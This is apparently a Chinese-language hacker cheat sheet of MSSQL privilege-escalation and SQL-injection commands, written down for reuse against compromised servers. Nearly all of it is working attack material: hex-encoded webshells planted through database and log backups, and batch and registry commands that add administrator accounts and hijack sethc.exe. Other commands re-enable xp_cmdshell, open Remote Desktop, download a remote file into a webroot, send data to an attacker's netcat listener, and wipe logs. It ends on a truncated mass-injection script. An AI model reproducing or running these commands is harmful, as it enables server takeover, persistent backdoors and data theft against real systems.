mssql提权 常用命令提权技巧
- 得到硬盘文件信息
- –参数说明:目录名,目录深度,是否显示文件
- execute master..xp_dirtree ‘c:’
- execute master..xp_dirtree ‘c:’,1
- execute master..xp_dirtree ‘c:’,1,1
-
- ——————————-
- db取系统权限5步之hta
- ——————————-
-
- declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x636E36353636 backup database @a to disk=@s–
-
- Drop table [cn911];create table [dbo].[cn911] ([cmd] [image])–
-
- insert into cn911(cmd) values (0x3C3F706870206576616C28245F504F53545B61685D293B3F3E)–
-
- declare
@a sysname,@s varchar(4000) select @a=db_name
(),@s=0x443A5C686F7374696E675C777777726F6F745C753467616D655F636F6D5C6874646F63735C696D6167655C782E706870
backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
-
- Drop table [cn911]–
-
- ——————————-
- db取系统权限6步之bat
- ——————————-
- alter database [test] set RECOVERY FULL–
- create table cmd (a image)–
- backup log [test] to disk = ‘c:\windows\temp\cmd1′ with init–
- insert
into cmd (a) values
(0x406563686F206F66660D0A406563686F206F66660D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F2065786563206D61737465722E64626F2E73705F6164646C6F67696E20276A61636B272C276A61636B27203E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206563686F20657865632073705F616464737276726F6C656D656D62657220276A61636B272C2773797361646D696E27203E3E746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206973716C202D45202F5520616C6D61202F50202F6920633A5C746573742E7172790D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572206675636B796F756D616D610D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E65743120757365722073716C6465627567676572202F6163746976653A7965730D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206E657431206C6F63616C67726F75702061646D696E6973747261746F72732073716C6465627567676572202F6164640D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C73686966742E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206373637269707420633A5C77696E646F77735C74656D705C686173682E7662730D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672065766572796F6E653A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F63206361636C7320633A5C77696E646F77735C73797374656D33325C73657468632E657865202F74202F65202F63202F672061646D696E6973747261746F72733A660D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F6320636F707920633A5C77696E646F77735C73797374656D33325C7461736B6D67722E65786520633A5C77696E646F77735C73797374656D33325C73657468632E657865202F790D0A40636D642E657865202F632064656C202530250D0A40636D642E657865202F632064656C202530250D0A400D0A40)–
- backup log [test] to disk = ‘C:\Documents and Settings\All Users\「开始」菜单\程序\启动\x.bat’–
- drop table cmd–
-
- @echo off
- @echo off
- @cmd.exe /c echo exec master.dbo.sp_addlogin ‘jack’,'jack’ >test.qry
- @cmd.exe /c echo exec master.dbo.sp_addlogin ‘jack’,'jack’ >test.qry
- @cmd.exe /c echo exec sp_addsrvrolemember ‘jack’,'sysadmin’ >>test.qry
- @cmd.exe /c echo exec sp_addsrvrolemember ‘jack’,'sysadmin’ >>test.qry
- @cmd.exe /c isql -E /U alma /P /i c:\test.qry
- @cmd.exe /c isql -E /U alma /P /i c:\test.qry
- @cmd.exe /c net1 user sqldebugger daoke
- @cmd.exe /c net1 user sqldebugger daoke
- @cmd.exe /c net1 user sqldebugger /active:yes
- @cmd.exe /c net1 user sqldebugger /active:yes
- @cmd.exe /c net1 localgroup administrators sqldebugger /add
- @cmd.exe /c net1 localgroup administrators sqldebugger /add
- @cmd.exe /c cscript c:\windows\temp\shift.vbs
- @cmd.exe /c cscript c:\windows\temp\shift.vbs
- @cmd.exe /c cscript c:\windows\temp\hash.vbs
- @cmd.exe /c cscript c:\windows\temp\hash.vbs
- @cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
- @cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g everyone:f
- @cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
- @cmd.exe /c cacls c:\windows\system32\sethc.exe /t /e /c /g administrators:f
- @cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
- @cmd.exe /c copy c:\windows\system32\taskmgr.exe c:\windows\system32\sethc.exe /y
- @cmd.exe /c del %0%
- @cmd.exe /c del %0%
- @
- @
-
- ——————————-
- sa取系统权限之sp_makewebtask
- ——————————-
- sp_makewebtask ‘c:\1.hta’,’ select ”<script language=VBScript>
- On Error Resume Next
- set wshshell=createobject(“wscript.shell”)
- a=wshshell.run (“command.com /c net1 user jack jackjack123!@# /add”,0)
- </script>” ‘;–
- ——————————
- xp_lake2 提权
- ——————————
-
- 执行命令
- exec xp_lake2 ‘ipconfig’
- 添加存储过程
- sp_addextendedproc xp_cmdshell,@dllname=’E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll’
- sp_addextendedproc ‘xp_lake2′, ‘E:\InetPub\wwwRoot\uploadfile\xp_lake2.dll’
- 删除存储过程
- sp_dropxtendedproc xp_lake2
-
- ——————————
- xp_cmdshell 提权
- ——————————
-
- 执行命令
- exec master.dbo.xp_cmdshell ‘cmd /c ipconfig’
-
- 开启cmdshell的SQL语句
- EXEC sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
-
- xp_cmdshell新的恢复办法 (效果很好)
- 删除
- drop procedure sp_addextendedproc
- drop procedure sp_oacreate
- exec master.dbo.sp_dropextendedproc ‘xp_cmdshell’
- 恢复
- dbcc addextendedproc (“sp_oacreate”,”odsole70.dll”)
- dbcc addextendedproc (“xp_cmdshell”,”xplog70.dll”)
- 这样可以直接恢复,不用去管sp_addextendedproc是不是存在
-
- 手工xp_cmdshell新的恢复办法
- 删除
- drop procedure sp_addextendedproc
- drop procedure sp_oacreate
- exec master.dbo.sp_dropextendedproc ‘xp_cmdshell’
- 恢复
- ;use master;dbcc addextendedproc (“sp_oacreate”,”odsole70.dll”)
- ;use master;dbcc addextendedproc (“xp_cmdshell”,”xplog70.dll”)
- —–
- ;exec/**/master..sp_addextendedproc/**/[xp_cmdshell],[xplog70.dll]–
- ;use/**/master/**/dbcc/**/addextendedproc([xp_cmdshell],[xplog70.dll])–
- ;use/**/master/**/dbcc/**/addextendedproc([sp_OACreate],[odsole70.dll])–
-
- 恢复xp_cmdshell
- Exec
master.dbo.sp_addextendedproc ‘xp_cmdshell’,'xplog70.dll’;select
count(*) from master.dbo.sysobjects where xtype=’X’ and
name=’xp_cmdshell’
- 返回结果为1就OK
-
- 否则上传xplog70.dll
- Exec master.dbo.sp_addextendedproc ‘xp_cmdshell’,'F:\xx.com\xplog70.dll’
-
- 常见情况恢复执行xp_cmdshell.
-
- 1 未能找到存储过程’master..xpcmdshell’.
- 恢复方法:查询分离器连接后,
- 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
- 第二步执行:EXEC sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
- 然后按F5键命令执行完毕
-
- 2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- 恢复方法:查询分离器连接后,
- 第一步执行:EXEC sp_dropextendedproc “xp_cmdshell”
- 第二步执行:EXEC sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
- 然后按F5键命令执行完毕
-
- 3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
- 恢复方法:查询分离器连接后,
- 第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
- 第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
- 然后按F5键命令执行完毕
-
- 4
SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’
的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用
‘xp_cmdshell’。有关启用 ‘xp_cmdshell’ 的详细信息,请参阅 SQL Server 联机丛书中的 “外围应用配置器”。
- 恢复方法:查询分离器连接后,
- 第一步执行:EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;
- 然后按F5键命令执行完毕
-
- mssql2005
-
- 启用xp_cmdshell
-
- USE master
- EXEC sp_configure ‘show advanced options’, 1
- RECONFIGURE WITH OVERRIDE
- EXEC sp_configure ‘xp_cmdshell’, 1
- RECONFIGURE WITH OVERRIDE
- EXEC sp_configure ’show advanced options’, 0
- RECONFIGURE WITH OVERRIDE
-
- –关闭xp_cmdshell
- USE master
- EXEC sp_configure ‘show advanced options’, 1
- RECONFIGURE WITH OVERRIDE
- EXEC sp_configure ‘xp_cmdshell’, 0
- RECONFIGURE WITH OVERRIDE
- EXEC sp_configure ’show advanced options’, 0
- RECONFIGURE WITH OVERRIDE
-
-
-
- ————————————–
- 只要ws没删 用下面这个语句百试不爽
- declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c ipconfig’
-
- DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [d:\cmd.exe /c dir c:\] –
-
- ————————————–
-
- ————————————–
- sa(shift取系统权限)
-
- declare
@o int exec sp_oacreate ‘scripting.filesystemobject’, @o out exec
sp_oamethod @o, ‘copyfile’,null,’c:\windows\system32\taskmgr.exe’
,’c:\windows\system32\sethc.exe’;
-
- declare
@oo int exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec
sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\taskmgr.exe’
,’c:\windows\system32\dllcache\sethc.exe’;
-
- ————————————–
-
- 在WEBSHELL里转了半天还是没什么收获,感觉还是得靠那个SA来提权,于是笔者问了下朋友,他说你怎么忘了沙盒模式?
- 看来最近脑子晕了于是在查询分析器里执行:
- 意思是修改注册表,开启沙盒:
- EXEC master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SoftWare\Microsoft\Jet\4.0\Engine’,'SandBoxMode’,'REG_DWORD’,’0′
-
- exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Jet\4.0\Engines’,'SandBoxMode’,'REG_DWORD’,1
-
- 0 禁止一切(默认)
- 1 使能访问ACCESS,但是禁止其它
- 2 禁止访问ACCESS,但是使能其他
- 3 使能一切
-
- 通过沙盒添加用户
- Select
* From
OpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;Database=c:\windows\system32\ias\ias.mdb’,'select
shell(“cmd.exe /c ipconfig”)’);
-
- 添加系统帐户(重启后生效DB权限就可以执行)
- xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\currentversion\run’,'jack’,'REG_SZ’,'ipconfig’
- xp_regwrite
‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\currentversion\run’,'jack1′,’REG_SZ’,'net
localgroup administrators jack /add’
-
- 映像劫持
- xp_regwrite
‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows
NT\currentversion\Image File Execution
Options\sethc.exe’,'debugger’,'REG_SZ’,'c:\windows\system32\taskmgr.exe’
-
- ——————–
- sa radmin提权
- ——————–
- 某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令
- EXEC
master.dbo.xp_regwrite
‘HKEY_LOCAL_MACHINE’,'SYSTEM\RAdmin\v2.0\Server\Parameters’,'Parameter’,'REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c
- 即可修改密码为12345678。如果要修改端口值
- EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SYSTEM\RAdmin\v2.0\Server\Parameters’,'port’,'REG_BINARY’,0xd20400 则端口值改为1234
-
- 删除添加储存过程
- drop procedure sp_addlogin
- add procedure sp_addlogin
-
- 恢复存储过程
-
- 于是马上想到恢复存储过程来执行命令,于是在查询分析器里执行:
-
- use master
- exec sp_addextendedproc xp_cmdshell,’xp_cmdshell.dll’
- exec sp_addextendedproc xp_dirtree,’xpstar.dll’
- exec sp_addextendedproc xp_enumgroups,’xplog70.dll’
- exec sp_addextendedproc xp_fixeddrives,’xpstar.dll’
- exec sp_addextendedproc xp_loginconfig,’xplog70.dll’
- exec sp_addextendedproc xp_enumerrorlogs,’xpstar.dll’
- exec sp_addextendedproc xp_getfiledetails,’xpstar.dll’
- exec sp_addextendedproc sp_OACreate,’odsole70.dll’
- exec sp_addextendedproc sp_OADestroy,’odsole70.dll’
- exec sp_addextendedproc sp_OAGetErrorInfo,’odsole70.dll’
- exec sp_addextendedproc sp_OAGetProperty,’odsole70.dll’
- exec sp_addextendedproc sp_OAMethod,’odsole70.dll’
- exec sp_addextendedproc sp_OASetProperty,’odsole70.dll’
- exec sp_addextendedproc sp_OAStop,’odsole70.dll’
- exec sp_addextendedproc xp_regaddmultistring,’xpstar.dll’
- exec sp_addextendedproc xp_regdeletekey,’xpstar.dll’
- exec sp_addextendedproc xp_regdeletevalue,’xpstar.dll’
- exec sp_addextendedproc xp_regenumvalues,’xpstar.dll’
- exec sp_addextendedproc xp_regread,’xpstar.dll’
- exec sp_addextendedproc xp_regremovemultistring,’xpstar.dll’
- exec sp_addextendedproc xp_regwrite,’xpstar.dll’
- exec sp_addextendedproc xp_availablemedia,’xpstar.dll’
- exec sp_addextendedproc sp_makewebtask,’xpweb70.dll’
-
- 恢复sp_addextendedproc,语句如下:
- create procedure sp_addextendedproc — 1996/08/30 20:13
- @functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
- set implicit_transactions off
- if @@trancount > 0
- begin
- raiserror(15002,-1,-1,’sp_addextendedproc’)
- return (1)
- end
- dbcc addextendedproc( @functname, @dllname)
- return (0) — sp_addextendedproc
-
-
-
- 读取配置文件信息
-
- declare @o int, @f int, @t int, @ret int
- declare @line varchar(8000)
- exec sp_oacreate ‘scripting.filesystemobject’, @o out
- exec sp_oamethod @o, ‘opentextfile’, @f out, ‘d:\Serv-U6.3\ServUDaemon.ini’, 1
- exec @ret = sp_oamethod @f, ‘readline’, @line out
- while( @ret = 0 )
- begin
- print @line
- exec @ret = sp_oamethod @f, ‘readline’, @line out
- end
-
- 写进su配置文件提权
-
- declare @o int, @f int, @t int, @ret int
- exec sp_oacreate ‘scripting.filesystemobject’, @o out
- exec sp_oamethod @o, ‘createtextfile’, @f out, ‘d:\Serv-U6.3\ServUDaemon.ini’, 1
- exec @ret = sp_oamethod @f, ‘writeline’, NULL,
-
- 查看终端
- exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp’,'PortNumber’
-
-
- SQL语句下载
-
- DECLARE
- @B varbinary(8000),
- @hr int,
- @http INT,
- @down INT
-
- EXEC sp_oacreate [Microsoft.XMLHTTP],@http output
- EXEC @hr = sp_oamethod @http,[Open],null,[GET],[http://xxx.org/jsp.zip],0
- EXEC @hr = sp_oamethod @http,[Send],null
- EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output
- EXEC @hr=sp_oacreate [ADODB.Stream],@down output
- EXEC @hr=sp_OASetProperty @down,[Type],1
- EXEC @hr=sp_OASetProperty @down,[mode],3
- EXEC @hr=sp_oamethod @down,[Open],null
- EXEC @hr=sp_oamethod @down,[Write],null,@B
- EXEC @hr=sp_oamethod @down,[SaveToFile],null,[d:\java\Tomcat 5.5\webapps\XXXX\1.jsp],1 ;–
-
-
-
-
-
-
-
-
-
- web注入
- 字符型需要在浏览器输入’ 如id=xx’;
- 数字型则不需要 如id=xx;
-
- sa直接写一句话
- sp_makewebtask ‘e:\gygov.com\xx.asp’,’ select ”<%execute request(“ah”)%>” ‘;–
-
- ——————————————————————-
- sql备份
-
- 日志备分WEBSHELL标准的七步:
- 1.InjectionURL’;alter database mm_db set RECOVERY FULL– (把SQL设置成日志完全恢复模式)
- 2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
- 3.InjectionURL’;backup log mm_db to disk = ‘c:\cmd’ with init– (减少备分数据的大小)
- 4.InjectionURL’;insert into cmd (a) values (‘<%%25eval(request(“a”)):response.end%%25>’)– (插入一句话木马)
- 5.InjectionURL’;backup log mm_db to disk = ‘d:\chinakm\test.asp’– (备分日志到WEB路径)
- 6.InjectionURL’;drop table cmd– (删除新建的cmd表)
- 7.InjectionURL’;alter database mm_db set RECOVERY SIMPLE–(把SQL设置成日志简单恢复模式)
-
- 数据库差异备份代码:
-
- 1、create table [dbo].[jm_tmp] ([cmd] [image])– 创建一个表
-
- 2、
declare @a sysname,@s nvarchar(4000) select
@a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s
–备份数据库,@s为备份名称(jmdcw的16进制转换)
-
- 3、
insert into [jm_tmp](cmd)
values(0x3C2565786563757465287265717565737428226C222929253E)–将一句话木马
“<%execute(request(“l”))%>”的16进制字符插入到表中
-
- 4、
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’C:\xx.asp’
backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT
–对数据库实行差异备份,备份的保存路径暂定为C盘目录,文件名为xx.asp。
-
- 5、drop table [jm_tmp]– 删除此表。
-
- Mssql2005 Log备份Webshell 9步
- ;alter/**/database/**/[ikoreadb]/**/set/**/recovery/**/full–
- ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init–
- ;drop/**/table/**/[JCZ3Tmp]–
- ;create/**/table/**/[JCZ3Tmp]([a]/**/image)–
- ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init–
- ;insert/**/into/**/[JCZ3Tmp]([a])/**/values(0x3C2545786563757465287265717565737428226168222929253E)–
- ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x64003A005C0069006B006F007200650061007700650062005C007500730065007200660069006C00650073005C00660069006C0065005C007300730073002E00610073007000/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init–
- ;drop/**/table/**/[JCZ3Tmp]–
- ;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[ikoreadb]/**/to/**/disk%3D@d/**/with/**/init–
-
- ———————————————————————–
-
- -获得MS SQL的版本号
- execute master..sp_msgetversion
-
- 获取当前库服务器机器名
- Select host_name()
-
- ————————————-
- 创建个登陆mssql的帐号
- ————————————-
- exec master.dbo.sp_addlogin jack,jack;–
- 加mssql帐户为jack
- exec master.dbo.sp_addsrvrolemember satan,sysadmin;–
- 把创建的mssql登陆帐号jack提升到sysadmin
-
- 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!
-
- –列出服务器上所有windows本地组
- execute master..xp_enumgroups //dbo
-
- –显示系统上可用的盘符
- execute master..xp_availablemedia //dbo
-
-
- //看看是什么权限的
- and 1=(Select IS_MEMBER(‘db_owner’))
- And char(124)%2BCast(IS_MEMBER(‘db_owner’) as varchar(1))%2Bchar(124)=1 ;–
-
- //检测是否有读取某数据库的权限
- and 1= (Select HAS_DBACCESS(‘master’))
- And char(124)%2BCast(HAS_DBACCESS(‘master’) as varchar(1))%2Bchar(124)=1 –
-
-
- 数字类型
- and char(124)%2Buser%2Bchar(124)=0
-
- 字符类型
- ‘ and char(124)%2Buser%2Bchar(124)=0 and ”=’
-
- 搜索类型
- ‘ and char(124)%2Buser%2Bchar(124)=0 and ‘%’=’
-
- 爆用户名
- and user>0
- ‘ and user>0 and ”=’
-
- 检测是否为SA权限
- or convert(int, system_user)=1–
- and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 –
-
- 检测是不是MSSQL数据库
- and exists (select * from sysobjects);–
-
- 检测是否支持多行
- ;declare @d int;–
-
- select * from openrowset(‘sqloledb’,'server=192.168.1.200,1433;uid=test;pwd=pafpaf’,'select @@version’)
-
- 停掉或激活某个服务。
- exec master..xp_servicecontrol ‘stop’,'schedule’
- exec master..xp_servicecontrol ‘start’,'schedule’
-
- xp_terminate_process
- 停掉某个执行中的程序,但赋予的参数是 Process ID。
- 利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
- xp_terminate_process 2484
-
- xp_unpackcab
- 解开压缩档。
- xp_unpackcab ‘c:\test.cab’,'c:\temp’,1
-
- 更改sa口令方法:用sql综合利用工具连接后,执行命令:
- exec sp_password NULL,’新密码’,'sa’
-
- —————————–
- cmd加sql帐户
- —————————–
- echo exec master.dbo.sp_addlogin ‘jack’,'jack’ >test.qry
- echo exec sp_addsrvrolemember ‘jack’,'sysadmin’ >>test.qry
- cmd.exe /c isql -E /U alma /P /i c:\test.qry
-
- mssql更新及查询语句
-
- select * from db_name where tablename=’x140m1n6′
- 从db_name表中寻找出tablename是 x140m1n6的信息数据
-
- UPDATE db_name SET monery = ’10.00′ WHERE UserName = ‘x140m1n6′
- 修改数据库db_name,设置Username为x140m1n6的money项为10.
-
- 查询
- select * from dnt_users where uid=577
-
-
- 插马
- ;update+表名+set+字段名=插马地址+where+id=(要插马的id)–
- 例子
- http://www.xxx.com/xxx.asp?id=2122;update+law+set+title=0xC3BFC8D5BEADBCC3D0C2CEC5A3BAB0D9CBBCC2F2B7C5BBBAD6D0B9FACDD8D5B9BDC5B2BD0D0A+where+id=1115–
-
- sql2005存储添加
- EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;
-
- exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;
-
- exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,1;RECONFIGURE;
-
-
- ——————————————
- sql开 3389
-
- ‘exec master..xp_regwrite @r,’software\microsoft\windows\currentversion\netcache’,'enable’,'reg_sz’,’0′;—-
- ;declare
@r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_regwrite
@r,’software\microsoft\windows
nt\currentversion\winlogon’,'shutdownwithoutlogon’,'reg_sz’,’0′;—-
- ;declare
@r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_regwrite
@r,’software\policies\microsoft\windows\installer’,'enableadmintsremote’,'reg_dword’,1;—-
- ;declare
@r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_regwrite
@r,’system\currentcontrolset\control\terminal
server’,'Tsenabled’,'reg_dword’,1;—-
- ;declare
@r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_regwrite
@r,’system\currentcontrolset\services\termdd’,'start’,'reg_dword’,2;—-
- ;declare
@r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_regwrite
@r,’system\currentcontrolset\services\termservice’,'start’,'reg_dword’,2;—-
- ;declare
@r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_regwrite
‘hkey_users’,’.default\keyboard layout\toggle’,'hotkey’,'reg_sz’,’1′;—-
- ;declare @r varchar(255) set @r=’HKEY_LOCAL_MACHINE’exec master..xp_cmdshell ‘iisreset /reboot’;—-
-
- ——————————————-
-
- 在db权限并且分离获取mssql数据库服务器ip的方法
-
- 1.本地nc监听 nc -vvlp 80
-
- 2.;insert
into
OPENROWSET(‘SQLOLEDB’,'uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;
‘, ‘select * from dest_table’) select * from src_table;–
- 其他的都不用管
-
-
- 去掉tenlnet的ntlm认证
- ;exec master.dbo.xp_cmdshell ‘tlntadmn config sec = -ntlm’—
-
- public权限列目录
-
- 提
起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是
系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法
建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧
-
- –建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
-
- create table ##nonamed(
-
- dir ntext,
-
- num int
-
- )
-
- –调用存储过程把执行回来的数据存到临时表里面
-
- insert ##nonamed execute master..xp_dirtree ‘c:\’,1
-
- –然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
-
- insert into openrowset(‘sqloledb’, ’192.0.0.1′;’user’;'pass’, ‘select * from Northwind.dbo.dirtree’)
-
- select * from ##nonamed
-
- 以上方法,也就是说public可以遍历用户服务器的目录
-
- dtproperties这个表默认是public可写的,提示够清楚了吧
- 手工列目录语句
- ‘;DROP
TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth
VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec
master..xp_dirtree “C:\”, 1,1–
-
- ‘ And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 and ”=’
-
- 2005恢复 xp_cmdshell
-
- EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;
-
- 2005恢复 sp_oacreate
-
- exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;
-
- 清理掉SQL日志
- set nocount on
- declare @logicalfilename sysname,
- @maxminutes int,
- @newsize int
-
- mssql清除日志
-
- DUMP TRANSACTION 数据库名 WITH NO_LOG
-
- 对mssql事务日志变大的处理 清空日志
- DUMP TRANSACTION 数据库名 WITH NO_LOG
-
- 截断事务日志
- BACKUP LOG 数据库名 WITH NO_LOG
-
- 收缩数据库
- DBCC SHRINKDATABASE(数据库名)
-
-
- mssql导出数据库表
- 本机
- exec master..xp_cmdshell ‘bcp ikoreaDB..member out d:\tt.xls -c -t, -T’
- 远程
- exec master..xp_cmdshell ‘bcp Databse..table out d:\tt.txt -c -t , -Sservername -Uuser -Ppassword’
- servername为sqlserver的名字
- user为id
- password 为密码
-
-
- 映像劫持ii
- exec
master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows
NT\Currentversion\Image File Execution
Options\osk.exe’,'debugger’,'REG_sz’,'g:\web\rootsite\djsite\uploadfile\nt.exe
on’;–
-
-
-
- SQL开3389命令2007-05-19 12:22把一次从SQL开3389的记录过程发出来,望对新手有用
-
- 注://为注释
- 实例过程:
- 连接到主机:
-
- xxx.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
- 命令:
-
- xp_cmdshell “type c:\boot.ini” // 输入命令,看系统,server版的才能 开3389
- 执行成功,
-
- 结果:
- [boot loader]
- timeout=30
- default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
- [operating systems]
- multi(0)disk(0)rdisk(0)partition(1)\WINNT=”Microsoft Windows 2000 Server” /fastdetect
- multi(0)disk(0)rdisk(0)partition(1)\WINNT=”Microsoft Windows 2000 Server” /fastdetect
-
- 命令:
-
- xp_cmdshell “echo [Components] > c:\hack” //在c盘根目录建写入一个文件,文件名hack大家可以自己改为自己的
- 执行成功,
-
-
- 命令:
-
- xp_cmdshell “echo TsEnable = on >> c:\hack” //追加写入
- 执行成功,
-
- 结果:
-
-
- 命令:
-
- xp_cmdshell “type c:\hack” //看看hack里的内容是否正确
- 执行成功,
-
- 结果:
- [Components]
- TsEnable = on
- TsEnable = on
-
- 命令:
-
- xp_cmdshell “sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\hack /q” //开3389,成功的话过会肉机会重启!!
- 执行成功,
-
- 结果:
- GetLocalManagedApplications returned (2)
-
-
- 数据库挂马
- 针对ASP+mssql攻击测试代码:
- declare @t varchar(255),
- @c varchar(255)
- declare table_cursor cursor for
- select a.name,b.name
- from sysobjects a,
- syscolumns b
- where a.id=b.id and
- a.xtype=’u’ and
- (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
- open table_cursor
- fetch next from table_cursor into @t,@c
- while(@@fetch_status=0)
- begin
- exec(‘update ['+@t+'] set ['+@c+']=
